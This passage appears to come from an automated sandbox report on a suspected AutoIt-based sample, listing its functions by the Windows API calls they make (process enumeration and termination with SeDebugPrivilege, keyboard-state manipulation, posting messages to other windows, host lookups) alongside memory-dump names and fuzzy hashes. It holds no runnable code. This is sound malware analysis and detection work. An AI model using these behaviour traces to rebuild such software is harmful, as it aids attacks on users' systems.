                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00B11449,?,?,00000000), ref: 00B11830
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00B11449,?,?,00000000), ref: 00B11833
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B11449,?,?,00000000), ref: 00B11843
                                                                                                                  • GetCurrentProcess.KERNEL32(00B11449,00000000,?,00B11449,?,?,00000000), ref: 00B1184B
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00B11449,?,?,00000000), ref: 00B1184E
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00B11874,00000000,00000000,00000000), ref: 00B11868
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1957940570-0
                                                                                                                  • Opcode ID: 7efd9ce9b1bd24cafb274424bd8d0f9fb9913d3e888024d5d8fe59a59ff599c0
                                                                                                                  • Instruction ID: 2859a263eb8e3fa8f3914c8e7e54dc0fea019e4a4df5fa52f5dbeffca3a2e847
                                                                                                                  • Opcode Fuzzy Hash: 7efd9ce9b1bd24cafb274424bd8d0f9fb9913d3e888024d5d8fe59a59ff599c0
                                                                                                                  • Instruction Fuzzy Hash: 6601AC75241304BFE650ABA9DC49F573BACFB8AB11F504411FA05DB1A1CA7099008B20
APIs
  • Part of subcall function 00B1D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B1D501
  • Part of subcall function 00B1D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B1D50F
  • Part of subcall function 00B1D4DC: CloseHandle.KERNEL32(00000000), ref: 00B1D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B3A16D
• GetLastError.KERNEL32 ref: 00B3A180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B3A1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00B3A268
• GetLastError.KERNEL32(00000000), ref: 00B3A273
• CloseHandle.KERNEL32(00000000), ref: 00B3A2C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B43925
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B4393A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B43954
• _wcslen.LIBCMT ref: 00B43999
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00B439C6
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B439F4
Strings
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B1BCFD
• IsMenu.USER32(00000000), ref: 00B1BD1D
• CreatePopupMenu.USER32 ref: 00B1BD53
• GetMenuItemCount.USER32(017E4C38), ref: 00B1BDA4
• InsertMenuItemW.USER32(017E4C38,?,00000001,00000030), ref: 00B1BDCC
Strings
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00B1C913
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
APIs
Strings
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
APIs
Similarity
• API ID: _wcslen$LocalTime
• String ID:
APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00ACF953
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00B0F3D1
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00B0F454
Similarity
• API ID: ShowWindow
• String ID:
APIs
• DeleteObject.GDI32(00000000), ref: 00B42D1B
• GetDC.USER32(00000000), ref: 00B42D23
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B42D2E
• ReleaseDC.USER32(00000000,00000000), ref: 00B42D3A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B42D76
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B42D87
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B45A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00B42DC2
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B42DE1
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 8100e8ee9056cd513dc3f56fc794fd95f225f521b61f8c0bf5f6b693c9558b07
• Instruction ID: 0556098688b4bf30e1cf65a5bfe7e97daf8092b09154273819e544ef5f56f2b7
• Opcode Fuzzy Hash: 8100e8ee9056cd513dc3f56fc794fd95f225f521b61f8c0bf5f6b693c9558b07
• Instruction Fuzzy Hash: A421C961640A0AFBD62459219EC2FFA33ECEFA1384F8400A1FD059F682F760EE5091E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 6f9cbde12243b194d977202fc25cafce340189aefbb9d22349b9637fb09741f2
• Instruction ID: 18237e6d2d4450eb0c8e6dc8ae50ffaf99315f207ad4738bdfeb49e7cf324ee2
• Opcode Fuzzy Hash: 6f9cbde12243b194d977202fc25cafce340189aefbb9d22349b9637fb09741f2
• Instruction Fuzzy Hash: EAD1A275A0060A9FDF24CF98C881BAEB7F5FF48344F2484A9E915AB281D771ED45CB90
APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AF15CE
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF1651
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AF17FB,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF16E4
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF16FB
  • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF1777
• __freea.LIBCMT ref: 00AF17A2
• __freea.LIBCMT ref: 00AF17AE
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
• Opcode ID: 2e91fe23b721600a12e26eb7591eb1795de800d1eaafa58d9cf377f7c0d56ad8
• Instruction ID: 265ff15dd5bb83133ca94a473cd930bee8d9326f6430cb3f7109269ed67c7dba
• Opcode Fuzzy Hash: 2e91fe23b721600a12e26eb7591eb1795de800d1eaafa58d9cf377f7c0d56ad8
• Instruction Fuzzy Hash: E791B072E0021ADADF209FF5C981AFEBBB5AF49710F184659FA05E7150DB35DD408BA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2610073882-625585964
• Opcode ID: dcc44488d055732b41472bb5b20c530b289b43bc555efa97d0fd6fe949db5d04
• Instruction ID: 0bc86f448b46c03877d10f53d5ccf9278419d0bdd590f8e3aeb0e9f8ee02c24a
• Opcode Fuzzy Hash: dcc44488d055732b41472bb5b20c530b289b43bc555efa97d0fd6fe949db5d04
• Instruction Fuzzy Hash: 57918071A00215EBDF20CFA4D885FAEBBF8EF46710F208599F515AB291D770AD45CBA0
APIs
• SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B2125C
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B21284
• SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B212A8
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B212D8
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B2135F
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B213C4
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B21430
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ArraySafe$Data$Access$UnaccessVartype
• String ID:
• API String ID: 2550207440-0
• Opcode ID: 737b8f277f3acf0ca0e7b265a835538141e9cadea8e4599dcc840a93f07e8188
• Instruction ID: 73fd0a99bbbbf65f6b15e378917268919a13409479743c09ec006ae3e7741251
• Opcode Fuzzy Hash: 737b8f277f3acf0ca0e7b265a835538141e9cadea8e4599dcc840a93f07e8188
• Instruction Fuzzy Hash: 8B911375A00228AFDB00DFA8E884BFE77F5FF15714F1048A9E918EB291D774A941CB90
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: f9d626e40a7e87edc85086e11f60c83b89647c741dc8981cef47426ece3bbccc
• Instruction ID: 1fcff28ea52dbeb4b9c08904a335da97489a32703826b3c7d869e90451857c87
• Opcode Fuzzy Hash: f9d626e40a7e87edc85086e11f60c83b89647c741dc8981cef47426ece3bbccc
• Instruction Fuzzy Hash: ED913771D40219EFCB10CFA9C988AEEBBB8FF49320F158059E515B7291D774AA42CB60
APIs
• VariantInit.OLEAUT32(?), ref: 00B3396B
• CharUpperBuffW.USER32(?,?), ref: 00B33A7A
• _wcslen.LIBCMT ref: 00B33A8A
• VariantClear.OLEAUT32(?), ref: 00B33C1F
  • Part of subcall function 00B20CDF: VariantInit.OLEAUT32(00000000), ref: 00B20D1F
  • Part of subcall function 00B20CDF: VariantCopy.OLEAUT32(?,?), ref: 00B20D28
  • Part of subcall function 00B20CDF: VariantClear.OLEAUT32(?), ref: 00B20D34
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: afa760aecfb44560a2614df7d444969fef146498f3c64d7b7136db6139cb4dac
• Instruction ID: 5371572972eb8896449c08f3c0304a759c9fa6b12a7a4445abf808d6f0b97ff0
• Opcode Fuzzy Hash: afa760aecfb44560a2614df7d444969fef146498f3c64d7b7136db6139cb4dac
• Instruction Fuzzy Hash: 8C9147756083019FC700DF24C58196ABBE4FF89714F2489ADF89A9B351DB30EE45CB92
APIs
  • Part of subcall function 00B1000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?,?,00B1035E), ref: 00B1002B
  • Part of subcall function 00B1000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10046
  • Part of subcall function 00B1000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10054
  • Part of subcall function 00B1000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?), ref: 00B10064
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B34C51
• _wcslen.LIBCMT ref: 00B34D59
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B34DCF
• CoTaskMemFree.OLE32(?), ref: 00B34DDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
• Opcode ID: 6a3931ec4053fea6564f671e46613feb463381599083e8a97b16ea9fc9d18bfd
• Instruction ID: c091629dd0bf3b6737778eba18e23afa1e79bce20008d7e798a999b888cff830
• Opcode Fuzzy Hash: 6a3931ec4053fea6564f671e46613feb463381599083e8a97b16ea9fc9d18bfd
• Instruction Fuzzy Hash: 4E910971D002199FDF14DFA4D891AEEBBB8FF08310F2085AAE515A7251DB74AE45CF60
                                                                                                                  APIs
                                                                                                                  • GetMenu.USER32(?), ref: 00B42183
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00B421B5
                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B421DD
                                                                                                                  • _wcslen.LIBCMT ref: 00B42213
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00B4224D
                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00B4225B
                                                                                                                    • Part of subcall function 00B13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B13A57
                                                                                                                    • Part of subcall function 00B13A3D: GetCurrentThreadId.KERNEL32 ref: 00B13A5E
                                                                                                                    • Part of subcall function 00B13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B125B3), ref: 00B13A65
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B422E3
                                                                                                                    • Part of subcall function 00B1E97B: Sleep.KERNEL32 ref: 00B1E9F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4196846111-0
                                                                                                                  • Opcode ID: 70acaa176bf6bd2b6f13ce1ac20627f68e77913170f88975b54b1ba3d26fb33a
                                                                                                                  • Instruction ID: a26d2dedd8e9a91959792e1cee22fd6f23bf7b95a1bd3c5717324c8909e2bb2f
                                                                                                                  • Opcode Fuzzy Hash: 70acaa176bf6bd2b6f13ce1ac20627f68e77913170f88975b54b1ba3d26fb33a
                                                                                                                  • Instruction Fuzzy Hash: 38718E75A00205AFCB10DF64C981AAEBBF5FF88310F508499F916EB341DB74EE41AB90
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(017E4D00), ref: 00B47F37
                                                                                                                  • IsWindowEnabled.USER32(017E4D00), ref: 00B47F43
                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B4801E
                                                                                                                  • SendMessageW.USER32(017E4D00,000000B0,?,?), ref: 00B48051
                                                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00B48089
                                                                                                                  • GetWindowLongW.USER32(017E4D00,000000EC), ref: 00B480AB
                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B480C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4072528602-0
                                                                                                                  • Opcode ID: e6f77e8a4446961a3ea8a421db454f18a736f9eea246dce5576a9c0667488113
                                                                                                                  • Instruction ID: 189f1ab4db1832651c8944beef964c02545686e989886e9d53acb18176f0230c
                                                                                                                  • Opcode Fuzzy Hash: e6f77e8a4446961a3ea8a421db454f18a736f9eea246dce5576a9c0667488113
                                                                                                                  • Instruction Fuzzy Hash: A6718E34649244AFEB219F64C884FBA7BF9FF1A300F14449AE94597261CF31AE49EB50
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00B1AEF9
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B1AF0E
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00B1AF6F
                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B1AF9D
                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B1AFBC
                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B1AFFD
                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B1B020
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 7faa8f6969708e170d583f7519c556aa6a01230ba7aac6861d45dee8fea16bcc
                                                                                                                  • Instruction ID: 4edafadb3e3e85a7a90c8b83c1eb7fb57ceacd75fad8df3b589abc42467d16f9
                                                                                                                  • Opcode Fuzzy Hash: 7faa8f6969708e170d583f7519c556aa6a01230ba7aac6861d45dee8fea16bcc
                                                                                                                  • Instruction Fuzzy Hash: 0351E4A16057D53DFB3642348C49BFA7FE99B06304F4884C9F1D9868C2C3A8ADC9D761
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(00000000), ref: 00B1AD19
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B1AD2E
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00B1AD8F
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B1ADBB
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B1ADD8
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B1AE17
                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B1AE38
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 482f1a31c317662b07ed690f1e2a28db4e2a1a4b68670c3012f34e579ce94a8a
                                                                                                                  • Instruction ID: c8bed683c2fe9c5e670da99d25d09fc0cd3ea7c7a160dcf432e0f9f6c0b44761
                                                                                                                  • Opcode Fuzzy Hash: 482f1a31c317662b07ed690f1e2a28db4e2a1a4b68670c3012f34e579ce94a8a
                                                                                                                  • Instruction Fuzzy Hash: 4951F3A15067D53DFB3283348C85BFABEE8AB46300F5884D8E0D5568C2C6A4FCD8D762
                                                                                                                  APIs
                                                                                                                  • GetConsoleCP.KERNEL32(00AF3CD6,?,?,?,?,?,?,?,?,00AE5BA3,?,?,00AF3CD6,?,?), ref: 00AE5470
                                                                                                                  • __fassign.LIBCMT ref: 00AE54EB
                                                                                                                  • __fassign.LIBCMT ref: 00AE5506
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AF3CD6,00000005,00000000,00000000), ref: 00AE552C
